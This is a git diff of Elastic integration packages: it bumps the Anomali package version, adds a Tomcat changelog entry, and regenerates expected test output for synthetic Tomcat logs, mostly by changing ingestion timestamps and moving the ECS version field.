@@ -5580,7 +5580,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810396300Z", + "ingested": "2021-12-14T14:58:45.613636672Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5630,7 +5630,7 @@ }, "event": { "severity": 7, - "ingested": "2021-12-13T08:39:43.810401900Z", + "ingested": "2021-12-14T14:58:45.613637095Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5679,7 +5679,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810406200Z", + "ingested": "2021-12-14T14:58:45.613637535Z", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -5729,7 +5729,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-13T08:39:43.810411300Z", + "ingested": "2021-12-14T14:58:45.613637922Z", "category": "threat", "type": "indicator", "kind": "enrichment" diff --git a/packages/ti_anomali/manifest.yml b/packages/ti_anomali/manifest.yml index 43ac7d2e8a8..de62eb6716e 100644 --- a/packages/ti_anomali/manifest.yml +++ b/packages/ti_anomali/manifest.yml @@ -1,6 +1,6 @@ name: ti_anomali title: Anomali -version: 1.1.2 +version: 1.1.3 release: ga description: Collect threat intelligence from Anomali APIs with Elastic Agent. type: integration diff --git a/packages/tomcat/changelog.yml b/packages/tomcat/changelog.yml index 9ef1bf9024c..4ca9a7f10b1 100644 --- a/packages/tomcat/changelog.yml +++ b/packages/tomcat/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 9cd3d2b81eb..59077043387 100644 --- a/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/tomcat/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1516-asdf: 10.251.224.219||eacommod||rci||[29/Jan/2016:6:09:59 OMST]||exercita||https://example.com/illumqui/ventore.html?min=ite#utl||vol||amremap||oremi||ntsunti||5293||https://mail.example.net/turadipi/aeca.htm?ntium=psaq#cer||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aliqu", "event": { - "ingested": "2021-06-09T13:32:47.950270Z" + "ingested": "2021-12-14T14:58:59.365385398Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-259-CFYZ: 10.196.153.12||sequa||abo||[12/Feb/2016:1:12:33 PST]||umqui||https://www5.example.net/mdolo/mqui.htm?sumdo=litesse#orev||pisciv||uii||umexe||estlabo||5222||https://mail.example.com/uat/eporr.jpg?byCicer=luptat#agn||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||nulapari", "event": { - "ingested": "2021-06-09T13:32:47.950293300Z" + "ingested": "2021-12-14T14:58:59.365387998Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 ctetur5806.api.home %APACHETOMCAT- COOK: 10.156.194.38||gnaali||enatus||[26/Feb/2016:8:15:08 PT]||incid||https://internal.example.com/tetur/idolor.html?ntex=eius#luptat||emape||aer||lupt||tia||7019||https://www.example.com/quis/orisn.txt?anti=ofdeF#metcons||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||nul", "event": { - "ingested": "2021-06-09T13:32:47.950300900Z" + "ingested": "2021-12-14T14:58:59.365389315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1060-INDEX: 10.196.118.192||tinculp||tur||[12/Mar/2016:3:17:42 CT]||equat||https://www5.example.org/nci/ofdeFin.gif?amco=exe#iatu||ionofde||con||uia||quiavo||1156||https://mail.example.com/consec/taliquip.html?radip=tNequ#gelit||Mozilla/5.0 (Linux; Android 9; 5024D_RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36 YaApp_Android/10.61 YaSearchBrowser/10.61||tconsec", "event": { - "ingested": "2021-06-09T13:32:47.950308700Z" + "ingested": "2021-12-14T14:58:59.365389747Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4141-BADMTHD: 10.246.209.145||oluptas||llu||[26/Mar/2016:10:20:16 GMT+02:00]||ommod||https://internal.example.com/aqui/radipis.jpg?llumd=enatuse#magn||equuntu||eos||enimad||rmagni||1998||https://internal.example.net/onev/tenima.jpg?seq=olorema#ccaecat||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||fug", "event": { - "ingested": "2021-06-09T13:32:47.950314600Z" + "ingested": "2021-12-14T14:58:59.365390156Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-2964-BADMETHOD: 10.114.191.225||uian||tempo||[09/Apr/2016:5:22:51 PST]||exercit||https://internal.example.com/omnis/antium.txt?lupta=iusmodt#doloreeu||pori||occ||ect||reetdolo||2770||https://www5.example.org/uiano/mrema.htm?anim=autfugi#inBCSedu||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||tanimi", "event": { - "ingested": "2021-06-09T13:32:47.950320100Z" + "ingested": "2021-12-14T14:58:59.365390546Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 erep2696.www.home %APACHETOMCAT- INDEX: 10.38.77.13||aquaeab||liqu||[24/Apr/2016:12:25:25 PT]||ehend||https://www5.example.net/uidolore/niamqu.gif?iat=tevelit#nsequat||loremagn||ipis||gelits||tatevel||3856||https://api.example.com/uovol/dmi.txt?quunt=ptat#ore||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||tsed", "event": { - "ingested": "2021-06-09T13:32:47.950326300Z" + "ingested": "2021-12-14T14:58:59.365390947Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 mUt2398.invalid %APACHETOMCAT- DEBUG: 10.11.201.109||boree||ugits||[08/May/2016:7:27:59 CEST]||iinea||https://www.example.org/idexea/riat.txt?tvol=moll#tatione||inB||deomni||tquovol||ntsuntin||3341||https://mail.example.org/imav/ididu.htm?tion=orsitame#quiratio||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||iam", "event": { - "ingested": "2021-06-09T13:32:47.950331100Z" + "ingested": "2021-12-14T14:58:59.365391327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3097-BADMTHD: 10.182.166.181||apariat||mol||[22/May/2016:2:30:33 CT]||olupta||https://api.example.org/toccae/tatno.gif?taliqu=temUten#ccusan||iqu||ollit||usan||aper||5529||https://example.org/uaera/sitas.txt?aedic=atquovo#iumto||Mozilla/5.0 (Linux; Android 4.1.2; Micromax P410i Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36||mquaera", "event": { - "ingested": "2021-06-09T13:32:47.950336Z" + "ingested": "2021-12-14T14:58:59.365391724Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6283-null: 10.185.126.247||vel||quu||[05/Jun/2016:9:33:08 OMST]||avol||https://mail.example.net/atuse/ddoeiu.gif?idolore=onse#liq||metcon||smo||litessec||emporinc||5075||https://internal.example.com/atcu/oremagna.jpg?remipsum=liq#ist||Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16||caecatc", "event": { - "ingested": "2021-06-09T13:32:47.950340900Z" + "ingested": "2021-12-14T14:58:59.365392115Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 siuta2896.www.localhost %APACHETOMCAT- SEARCH: 10.72.114.23||enia||nsequu||[20/Jun/2016:4:35:42 PST]||rsint||https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf||antiumto||strude||ctetura||usmod||1640||https://mail.example.net/lor/fugit.jpg?rsitamet=lupt#xea||Mozilla/5.0 (Linux; Android 6.0; ZTE BLADE V7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||orain", "event": { - "ingested": "2021-06-09T13:32:47.950347400Z" + "ingested": "2021-12-14T14:58:59.365392500Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 oin6316.www5.host %APACHETOMCAT- TRACE: 10.129.241.147||lores||lapariat||[04/Jul/2016:11:38:16 PST]||etc||https://example.net/nimadmin/ditautfu.html?lpa=entsu#dun||onproide||luptat||itaut||imaven||152||https://internal.example.net/onproide/Nemoen.gif?pitla=ccu#urE||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36||inculpaq", "event": { - "ingested": "2021-06-09T13:32:47.950352600Z" + "ingested": "2021-12-14T14:58:59.365393109Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 tionemu7691.www.local %APACHETOMCAT- BDMTHD: 10.185.101.76||errorsi||des||[18/Jul/2016:6:40:50 GMT+02:00]||stl||https://www5.example.com/ono/stru.jpg?emaperi=tame#tinvol||tectobe||colabor||iusmodt||etdolo||3768||https://internal.example.net/ommod/sequatur.txt?tlabo=suntexp#ugiatnu||Mozilla/5.0 (Linux; Android 5.1.1; Android Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/9.80 YaSearchBrowser/9.80||itecto", "event": { - "ingested": "2021-06-09T13:32:47.950357400Z" + "ingested": "2021-12-14T14:58:59.365393524Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3217-GET: 10.57.170.140||nsec||onse||[02/Aug/2016:1:43:25 OMST]||inibusBo||https://example.net/tion/eataev.htm?uiineavo=tisetq#irati||ici||giatquov||eritquii||dexeac||3088||https://www.example.org/oreseos/uames.txt?msequi=isnostru#iquaUten||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||iadese", "event": { - "ingested": "2021-06-09T13:32:47.950362200Z" + "ingested": "2021-12-14T14:58:59.365393984Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1109-PUT: 10.33.153.47||hil||atquovo||[16/Aug/2016:8:45:59 GMT+02:00]||iineavo||https://internal.example.com/isno/taliq.htm?nnu=dolo#Loremip||idolor||emeumfu||CSed||lupt||6136||https://internal.example.net/quip/mporain.txt?uatD=iunt#temveleu||Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||tio", "event": { - "ingested": "2021-06-09T13:32:47.950366900Z" + "ingested": "2021-12-14T14:58:59.365394370Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 conse2991.internal.lan %APACHETOMCAT- FGET: 10.116.104.101||gnam||tat||[30/Aug/2016:3:48:33 CET]||lumqui||https://internal.example.net/mdolore/rQuisau.gif?iavolu=den#tutla||olorema||iades||siarchi||datatn||5076||https://internal.example.net/mipsumd/eFinib.jpg?remi=saute#ercit||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||remagn", "event": { - "ingested": "2021-06-09T13:32:47.950372300Z" + "ingested": "2021-12-14T14:58:59.365394761Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-3361-null: 10.202.194.67||samvolu||ittenbyC||[13/Sep/2016:10:51:07 ET]||eirure||https://internal.example.com/oidentsu/atiset.jpg?ntor=lpaqui#sitame||iadese||nsectet||utla||utei||2716||https://example.com/tlabori/oin.jpg?quisnos=ite#ationul||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||eritqu", "event": { - "ingested": "2021-06-09T13:32:47.950377300Z" + "ingested": "2021-12-14T14:58:59.365395267Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 wri2784.api.domain %APACHETOMCAT- PUT: 10.153.111.103||itquiin||modocon||[28/Sep/2016:5:53:42 PST]||taevit||https://www5.example.com/etconse/tincu.txt?lit=asun#estia||eaq||occae||ctetura||labore||4621||https://www.example.com/adeseru/emoe.html?atur=itanimi#itame||Mozilla/5.0 (Linux; U; Android 4.0.3; es-us; GT-P3100 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30||rehender", "event": { - "ingested": "2021-06-09T13:32:47.950382Z" + "ingested": "2021-12-14T14:58:59.365395687Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1637-DETECT_METHOD_TYPE: 10.52.186.29||equat||doloreme||[12/Oct/2016:12:56:16 GMT+02:00]||ione||https://www5.example.org/eriamea/amre.htm?magni=pisciv#iquidex||radipisc||tmo||fficiade||uscipit||4168||https://internal.example.net/oru/temqu.htm?etMalor=ipi#reseos||Mozilla/5.0 (Linux; Android 8.0.0; VS996) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||mcolab", "event": { - "ingested": "2021-06-09T13:32:47.950387Z" + "ingested": "2021-12-14T14:58:59.365396076Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 oquisqu2937.mail.domain %APACHETOMCAT- BDMTHD: 10.209.182.237||tper||olor||[26/Oct/2016:7:58:50 GMT-07:00]||osqui||https://www.example.org/iutali/fdeFi.jpg?liquide=etdol#uela||boN||eprehend||aevit||aboN||3423||https://example.net/tlabo/uames.gif?mpo=offi#giatnu||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||lor", "event": { - "ingested": "2021-06-09T13:32:47.950392100Z" + "ingested": "2021-12-14T14:58:59.365396467Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 dolore1287.internal.lan %APACHETOMCAT- CFYZ: 10.63.194.87||quisno||sin||[10/Nov/2016:3:01:24 CT]||aliquam||https://mail.example.net/itatione/isnis.html?oluptate=issus#osamn||isnisiu||bore||tsu||tcons||3128||https://api.example.org/lorinre/olorsita.gif?idata=rumwritt#magnid||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||dol", "event": { - "ingested": "2021-06-09T13:32:47.950396600Z" + "ingested": "2021-12-14T14:58:59.365396862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4307-TRACE: 10.62.191.18||tevelite||orporiss||[24/Nov/2016:10:03:59 OMST]||tlabo||https://www.example.org/emvel/tmollita.htm?numqua=veni#eveli||eroi||dtemp||aliquide||ofde||4940||https://www5.example.org/maven/hende.jpg?labor=didunt#uptatema||Mozilla/5.0 (Linux; Android 10; STK-L21 Build/HUAWEISTK-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||udan", "event": { - "ingested": "2021-06-09T13:32:47.950402200Z" + "ingested": "2021-12-14T14:58:59.365397245Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6040-CFYZ: 10.238.164.29||aturQui||utlabor||[08/Dec/2016:5:06:33 ET]||temvel||https://example.net/nisi/dant.txt?ecte=tinvolu#iurer||iciadese||quidolor||tessec||olupta||2660||https://example.org/idolor/uisau.jpg?llumdolo=nre#ercitat||Mozilla/5.0 (Linux; Android 7.0; MEIZU M6 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||uiinea", "event": { - "ingested": "2021-06-09T13:32:47.950407400Z" + "ingested": "2021-12-14T14:58:59.365397636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-1612-SEARCH: 10.155.230.17||eni||ionevo||[23/Dec/2016:12:09:07 CT]||Ute||https://internal.example.com/sintocc/tlabor.txt?tDuisaut=oinBC#quameius||ipsumdol||tet||etdo||urerepr||4674||https://example.com/tetu/stru.htm?tlabore=Exc#pora||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||uteirure", "event": { - "ingested": "2021-06-09T13:32:47.950413200Z" + "ingested": "2021-12-14T14:58:59.365398126Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 ide2767.www5.local %APACHETOMCAT- RNDMMTD: 10.102.229.102||nnum||tenbyCi||[06/Jan/2017:7:11:41 PST]||tco||https://example.net/officiad/itam.html?madmi=tur#roi||niamqui||orem||sno||atno||5263||https://mail.example.net/ntocca/ostru.txt?quiavol=rrorsi#temquiav||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||sec", "event": { - "ingested": "2021-06-09T13:32:47.950419100Z" + "ingested": "2021-12-14T14:58:59.365398514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 sBon1759.invalid %APACHETOMCAT- HEAD: 10.194.14.7||ten||vita||[20/Jan/2017:2:14:16 OMST]||ullamcor||https://mail.example.org/tor/qui.txt?eavolup=fugiatn#docon||etconsec||ios||evolu||ersp||3536||https://www5.example.org/sauteiru/mod.gif?tes=mquame#nihilmol||Mozilla/5.0 (Linux; Android 8.1.0; SM-A260G Build/OPR6; rv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Rocket/2.1.17(19420) Chrome/81.0.4044.138 Mobile Safari/537.36||orain", "event": { - "ingested": "2021-06-09T13:32:47.950424Z" + "ingested": "2021-12-14T14:58:59.365398904Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6113-get: 10.99.0.226||madmi||uidol||[03/Feb/2017:9:16:50 ET]||quameius||https://api.example.net/roid/inibusB.jpg?Nemoenim=squirati#Sedutp||utp||ema||rsitv||iciade||5649||https://example.com/lup/tatemUt.html?upida=tvolupt#eufugi||Mozilla/5.0 (Linux; Android 9; Pixel 3 Build/PD1A.180720.030) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36||uredol", "event": { - "ingested": "2021-06-09T13:32:47.950429100Z" + "ingested": "2021-12-14T14:58:59.365399292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6945-DETECT_METHOD_TYPE: 10.107.174.213||tenimad||minimav||[18/Feb/2017:4:19:24 OMST]||taedicta||https://www.example.net/str/idolore.txt?eetdolo=cteturad#untut||uamni||ctet||ati||uine||2438||https://api.example.org/loreme/untu.htm?ven=con#nisist||Mozilla/5.0 (Linux; Android 6.0; QMobile X700 PRO II) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.92 Mobile Safari/537.36||ium", "event": { - "ingested": "2021-06-09T13:32:47.950434800Z" + "ingested": "2021-12-14T14:58:59.365399703Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 idunt4707.host %APACHETOMCAT- ABCD: 10.84.25.23||laudant||isnost||[04/Mar/2017:11:21:59 CET]||rQuisau||https://mail.example.org/iscinge/ofdeFini.jpg?molli=velitse#oditem||gitsedqu||borios||rsitvolu||quam||5315||https://www.example.org/ineavo/pexe.htm?iadolor=amcol#adeser||Mozilla/5.0 (Linux; Android 6.0; Lenovo A2016a40 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.106 Mobile Safari/537.36 YaApp_Android/10.30 YaSearchBrowser/10.30||gitsed", "event": { - "ingested": "2021-06-09T13:32:47.950440Z" + "ingested": "2021-12-14T14:58:59.365400089Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-4367-uGET: 10.193.143.108||idolo||luptate||[18/Mar/2017:6:24:33 PT]||atisun||https://www.example.org/epre/tobeata.html?quia=iduntu#idestlab||rnatur||ofdeFin||essequam||acommo||3105||https://api.example.com/cusant/atemq.gif?itecto=reetdol#totamre||Mozilla/5.0 (Linux; Android 9; ZTE Blade V1000RU Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Mobile Safari/537.36 YaApp_Android/10.91 YaSearchBrowser/10.91||ercita", "event": { - "ingested": "2021-06-09T13:32:47.950445200Z" + "ingested": "2021-12-14T14:58:59.365400481Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 emquia1497.www5.lan %APACHETOMCAT- INDEX: 10.190.51.22||uamei||siut||[02/Apr/2017:1:27:07 CT]||uisa||https://example.com/mexe/its.htm?ice=oles#edic||seq||tutlab||sau||atevelit||2450||https://example.org/aperia/ccaeca.gif?ttenby=boris#stenatu||Mozilla/5.0 (Linux; Android 9; Notepad_K10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Safari/537.36||orumSe", "event": { - "ingested": "2021-06-09T13:32:47.950450900Z" + "ingested": "2021-12-14T14:58:59.365400868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 riat3854.www5.home %APACHETOMCAT- BADMETHOD: 10.194.90.130||siut||tconsect||[16/Apr/2017:8:29:41 PT]||piscinge||https://www.example.com/velitess/naali.htm?nre=veli#volupta||rnatu||elitse||ima||quasia||2382||https://www5.example.com/quamqua/eacommod.html?iumdol=tpersp#stla||mobmail android 2.1.3.3150||sequamni", "event": { - "ingested": "2021-06-09T13:32:47.950456100Z" + "ingested": "2021-12-14T14:58:59.365401258Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-6198-BDMTHD: 10.10.213.83||nea||psum||[30/Apr/2017:3:32:16 OMST]||ncididun||https://www.example.org/xeacomm/cinge.txt?apariat=vitaedi#lorsita||dolore||uptate||quidexea||ect||23||https://internal.example.com/ate/odoconse.jpg?quatu=veli#tenim||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||labo", "event": { - "ingested": "2021-06-09T13:32:47.950461Z" + "ingested": "2021-12-14T14:58:59.365401666Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 aboreetd5461.host %APACHETOMCAT- uGET: 10.52.125.9||hit||urv||[14/May/2017:10:34:50 ET]||nimid||https://api.example.org/texpli/exeacom.jpg?rita=esseci#tametcon||liqua||mvele||isis||uasiar||2552||https://mail.example.net/loremqu/dantium.htm?teirured=onemulla#dolorem||Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 LightSpeed [FBAN/MessengerLiteForiOS;FBAV/266.0.0.32.114;FBBV/216059178;FBDV/iPhone10,6;FBMD/iPhone;FBSN/iOS;FBSV/13.4.1;FBSS/3;FBCR/;FBID/phone;FBLC/en_US;FBOP/0]||rauto", "event": { - "ingested": "2021-06-09T13:32:47.950468Z" + "ingested": "2021-12-14T14:58:59.365402063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%APACHETOMCAT-5770-RNDMMTD: 10.19.17.202||nby||mve||[29/May/2017:5:37:24 PT]||isau||https://api.example.net/ibusBon/ven.gif?nsequat=doloreme#dun||reprehe||tincu||suntin||itse||814||https://www5.example.org/intocc/amcorp.html?ssecillu=liqua#olo||Mozilla/5.0 (Linux; Android 9; G8142) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||aec", "event": { - "ingested": "2021-06-09T13:32:47.950473600Z" + "ingested": "2021-12-14T14:58:59.365402570Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 iquidexe304.mail.test %APACHETOMCAT- RNDMMTD: 10.195.64.5||oreetd||uat||[12/Jun/2017:12:39:58 PT]||moenimi||https://mail.example.org/oconsequ/edquiac.gif?preh=ercit#etMal||qua||rsita||ate||ipsamvo||344||https://api.example.com/tdol/upt.htm?asper=idunt#luptat||Mozilla/5.0 (Linux; Android 9; POCOPHONE F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.83 Mobile Safari/537.36||ica", "event": { - "ingested": "2021-06-09T13:32:47.950478400Z" + "ingested": "2021-12-14T14:58:59.365402957Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 remips4828.www5.host %APACHETOMCAT- POST: 10.209.77.194||tvolup||itesseq||[26/Jun/2017:7:42:33 OMST]||snost||https://internal.example.com/llamc/nte.htm?utali=porinc#tetur||xce||dat||aincidu||nimadmin||4843||https://mail.example.com/eumfugi/etdolor.htm?dic=cola#amcor||Mozilla/5.0 (Linux; Android 10; ASUS_X01BDA) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 